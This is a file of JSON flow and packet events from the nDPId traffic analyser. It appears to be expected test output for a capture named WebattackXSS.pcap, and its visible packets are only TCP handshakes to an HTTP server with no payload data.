-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z+5AAD4G9eGsEAABwKgKMuAcAFC7QQvkAAAAAKACchDyLAAAAgQFtAQCCAoBOsQKAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1499347455224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347455224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4BwGoR45u0EL5aAScSA0zgAAAgQFtAQCCAoD5JV\/ATrECgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1499347455225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347455225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z+9AAD4G9eisEAABwKgKMuAcAFC7QQvlBqEeOoAQAOXT1QAAAQEICgE6xAoD5JV\/"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347325777,"flow_last_seen":1499347331707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347328298,"flow_last_seen":1499347333709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347456462,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347456462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YWdAAD4GZGmsEAABwKgKMuAqAFCeBqRYAAAAAKACchB1sAAAAgQFtAQCCAoBOsU\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4CoPzfb\/ngakWaAScSDVKAAAAgQFtAQCCAoD5Ja1ATrFPwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1499347456463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347456463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YWhAAD4GZHCsEAABwKgKMuAqAFCeBqRZD833AIAQAOV0MAAAAQEICgE6xT8D5Ja1"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347457705,"flow_last_seen":1499347457705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347457705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1499347457705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA816NAAD4G7iysEAABwKgKMuA4AFCwfBHVAAAAAKACchD0eAAAAgQFtAQCCAoBOsZ2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1499347457705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4DiBhHFpsHwR1qAScSBmmgAAAgQFtAQCCAoD5JfrATrGdgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1499347457706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347457706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA016RAAD4G7jOsEAABwKgKMuA4AFCwfBHWgYRxaoAQAOUFogAAAQEICgE6xnYD5Jfr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347460253,"flow_last_seen":1499347460253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347460253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1499347460253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eW5AAD4GTGKsEAABwKgKMuBSAFDnp7GdAAAAAKACchAa7gAAAgQFtAQCCAoBOsjzAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1499347460253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4FLH4MUu56exnqAScSDwcAAAAgQFtAQCCAoD5JpoATrI8wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1499347460254,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347460254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eW9AAD4GTGmsEAABwKgKMuBSAFDnp7Gex+DFL4AQAOWPeAAAAQEICgE6yPMD5Jpo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347461508,"flow_last_seen":1499347461508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347461508,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1499347461508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80JNAAD4G9TysEAABwKgKMuBgAFDZtRq+AAAAAKACchC+dwAAAgQFtAQCCAoBOsotAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":1499347461508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4GAaiodM2bUav6AScSB9+QAAAgQFtAQCCAoD5JuiATrKLQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":1499347461509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347461509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00JRAAD4G9UOsEAABwKgKMuBgAFDZtRq\/GoqHTYAQAOUdAQAAAQEICgE6yi0D5Jui"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347462759,"flow_last_seen":1499347462759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347462759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1499347462759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K55AAD4GmjKsEAABwKgKMuBuAFAjB+D7AAAAAKACchCtogAAAgQFtAQCCAoBOstlAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1499347462759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4G52KJeXIwfg\/KAScSAAAgAAAgQFtAQCCAoD5JzbATrLZQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1499347462760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347462760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K59AAD4GmjmsEAABwKgKMuBuAFAjB+D8diiXmIAQAOWfCAAAAQEICgE6y2YD5Jzb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347465304,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465304,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nSBAAD4GKLCsEAABwKgKMuCIAFBo61DCAAAAAKACchD1YAAAAgQFtAQCCAoBOs3iAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4Ijwu80MaOtQw6AScSCVOwAAAgQFtAQCCAoD5J9XATrN4gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1499347465305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347465305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nSFAAD4GKLesEAABwKgKMuCIAFBo61DD8LvNDYAQAOU0QwAAAQEICgE6zeID5J9X"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
